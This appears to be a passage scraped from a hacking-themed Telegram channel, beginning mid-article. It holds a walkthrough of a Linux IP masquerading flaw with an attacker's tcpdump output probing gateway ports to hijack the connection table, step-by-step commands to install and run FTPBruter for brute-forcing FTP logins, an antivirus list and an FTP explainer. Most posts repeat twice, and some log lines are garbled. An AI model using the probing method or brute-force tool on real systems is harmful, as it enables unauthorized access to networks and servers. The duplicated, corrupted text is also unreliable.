6) When an internal IP wants to access the DNS server of the external network, when the UDP packet sent passes through the IP masquerading gateway, the kernel will add an entry to record the connection. For example, a UDP packet connected from internal host A's 1035 port to external host C's 53 port. The kernel replaces the source address of this packet with the IP of the masquerading gateway (B), and the source port is set to the one assigned on the gateway for this connection. Port, the default is from port 61000 to port 65096, so theoretically the core can handle 4096 TCP / UDP masquerading connections simultaneously.
Host A: 1035-> GW B: 63767-> Host C: 53
7) When an external network sends a UDP packet to the masquerading gateway, Linux IP masquerading only determines whether the UDP packet should be forwarded to the internal network based on the destination port. If the destination port has a corresponding entry in the established masquerade connection table, it will update the source IP and source port in this packet with the remote host IP and port of the corresponding entry. As long as the attacker determines the port of the masquerading gateway, he may use his own IP and port to rewrite the masquerading connection table. The range of ports used by masquerading gateways to service masquerading connections is usually from 61000 to 65096, so external attackers can easily determine which ports have been used to establish a connection. An attacker can send UDP detection packets to these ports spoofing the gateway, and then check the IP ID of the ICMP response packet of the port. Each host sends a packet, and the IP ID in its TCP / IP stack is incremented by one. Therefore, the ICMP response sent by the port used for ip masquerading will have the IP ID of the internal host.
This ID is usually much different from the current IP ID of the gateway host, usually more than 1000. The following example shows the process of using the vulnerability to attack:
Host A is the internal host (192.168.1.100) and
Host B is the masquerading gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25)
Host X is an external attacker's IP (10.10.187.13)
Before detection, execute the command on the masquerading gateway: ipchains -L -M -n to display the current masquerade connection table The situation:
> UDP 03: 39.21 192.168.1.100 10.0.0.25 1035 (63767)-> 53
is currently a connection sent from port 1035 of 192.168.1.100 to port 53 of 10.0.0.25, and the masquerade port is 63767
[from the attacker Results from tcpdump on the machine]
(To make it easier to see the problem, here we set the source port of all packets used for detection to 12345)
[Our detection will start from port 61000, we have omitted some of the previous results]
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345> 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (tos 0x18) ( ttl 254, id 23069)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345> 10.0.0.1.63764: udp 0 (DF ) [tos 0x18] (ttl 254, id 23070)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345> 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (tos 0x18) ( ttl 254, id 23071)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345> 10.0.0.1.63766: udp 0 (DF ) [tos 0x18] (ttl 254, id 23074)
10.0.0.1> 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345> 10.0.0.1. 63 767: 0 UDP (the DF) [TOS 0x18] (TTL 254, ID 23083)
10.0.0.1> 10.10.187.13: ICMP: 10.0.0.1 unreachable The UDP Port 63767 [TOS 0xD8] (TTL 244, ID 17205)
>
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ BEST ANTIVIRUS applications For Windows FROM UNDERCODE REPORTS 2020:
> T.me/UndercOdeTesting
1) Windows Def
> only if windows activated by product key
2) Kaspery
> we ve heard a fake news about fbi and kaspery
but still best
> https://me.kaspersky.com
3)Malwarebyte
https://www.malwarebytes.com/
> for any details or doubt feel free to ask
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ BEST ANTIVIRUS applications For Windows FROM UNDERCODE REPORTS 2020:
> T.me/UndercOdeTesting
1) Windows Def
> only if windows activated by product key
2) Kaspery
> we ve heard a fake news about fbi and kaspery
but still best
> https://me.kaspersky.com
3)Malwarebyte
https://www.malwarebytes.com/
> for any details or doubt feel free to ask
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Bruteforce Ftp Servers updated 2019
t.me/UndercOdeTesting
1) git clone https://github.com/GitHackTools/FTPBruter
2) cd FTPBruter
3) docker build -t xshuden/ftpbruter
4) docker run --rm -it xshuden/ftpbruter
5) docker run --rm -it -v '$(pwd):/tmp/' xshuden/ftpbruter
π¦ Install Python 3 on Arch Linux and its distros: sudo pacman -S python3
> Install Python 3 on Debian and its distros: sudo apt install python3
> git clone https://github.com/GitHackTools/FTPBruter
> cd FTPBruter
> python3 ftpbruter.py
π¦For WINDOWS :
1) Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
2) Download and run Git setup file from Git-scm.com and choose Use Git from Windows Command Propmt.
3)After that, open PowerShell or Command Propmt and enter these commands:
4) git clone https://github.com/GitHackTools/FTPBruter
5) cd FTPBruter
6) python3 ftpbruter.py
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Bruteforce Ftp Servers updated 2019
t.me/UndercOdeTesting
1) git clone https://github.com/GitHackTools/FTPBruter
2) cd FTPBruter
3) docker build -t xshuden/ftpbruter
4) docker run --rm -it xshuden/ftpbruter
5) docker run --rm -it -v '$(pwd):/tmp/' xshuden/ftpbruter
π¦ Install Python 3 on Arch Linux and its distros: sudo pacman -S python3
> Install Python 3 on Debian and its distros: sudo apt install python3
> git clone https://github.com/GitHackTools/FTPBruter
> cd FTPBruter
> python3 ftpbruter.py
π¦For WINDOWS :
1) Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
2) Download and run Git setup file from Git-scm.com and choose Use Git from Windows Command Propmt.
3)After that, open PowerShell or Command Propmt and enter these commands:
4) git clone https://github.com/GitHackTools/FTPBruter
5) cd FTPBruter
6) python3 ftpbruter.py
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is FTP ?
twitter.com/UndercOdeTC
> FTP is short for File Transfer Protocol.
> A protocol is a set of rules that networked computers use to talk to one another. And FTP is the language that computers on a TCP/IP network (such as the internet) use to transfer files to and from each other.
> Youβve probably encountered FTP out there on the net already. Ever downloaded a fresh nightly build of Firefox or grabbed MP3s from some kidβs personal server in Sweden?
Then you have probably used FTP without even knowing it.
> Todayβs web browsers allow you to download files via FTP from within the browser window. Itβs very convenient, and itβs great for those times you need to download a file or two, but the browser-download method does not offer much in the realm of flexibility.
> You canβt upload, force a particular transfer mode, or ask the server any questions. And donβt even get me started on the security issue. But if you are doing any sort of web development, you need all this functionality.
> The best way to pursue file transfers is with a bona fide FTP client. You use an FTP client to log into an FTP server, navigate the serverβs folder structure, and exchange files
π¦ Logging In
Connecting to an FTP server is very similar to connecting to just about any other server on the Web. When you log in to your Hotmail account or a secure shopping cart system (such as the one at Amazon.com), you have to provide a server address, a user name, and a password before you can exchange information with the server.
Letβs take a look at an example login set for an FTP server.
site:ftp.fakesite.org login:mcalore pass:h4x0r4lyfe port:21
powered by wiki
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is FTP ?
twitter.com/UndercOdeTC
> FTP is short for File Transfer Protocol.
> A protocol is a set of rules that networked computers use to talk to one another. And FTP is the language that computers on a TCP/IP network (such as the internet) use to transfer files to and from each other.
> Youβve probably encountered FTP out there on the net already. Ever downloaded a fresh nightly build of Firefox or grabbed MP3s from some kidβs personal server in Sweden?
Then you have probably used FTP without even knowing it.
> Todayβs web browsers allow you to download files via FTP from within the browser window. Itβs very convenient, and itβs great for those times you need to download a file or two, but the browser-download method does not offer much in the realm of flexibility.
> You canβt upload, force a particular transfer mode, or ask the server any questions. And donβt even get me started on the security issue. But if you are doing any sort of web development, you need all this functionality.
> The best way to pursue file transfers is with a bona fide FTP client. You use an FTP client to log into an FTP server, navigate the serverβs folder structure, and exchange files
π¦ Logging In
Connecting to an FTP server is very similar to connecting to just about any other server on the Web. When you log in to your Hotmail account or a secure shopping cart system (such as the one at Amazon.com), you have to provide a server address, a user name, and a password before you can exchange information with the server.
Letβs take a look at an example login set for an FTP server.
site:ftp.fakesite.org login:mcalore pass:h4x0r4lyfe port:21
powered by wiki
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β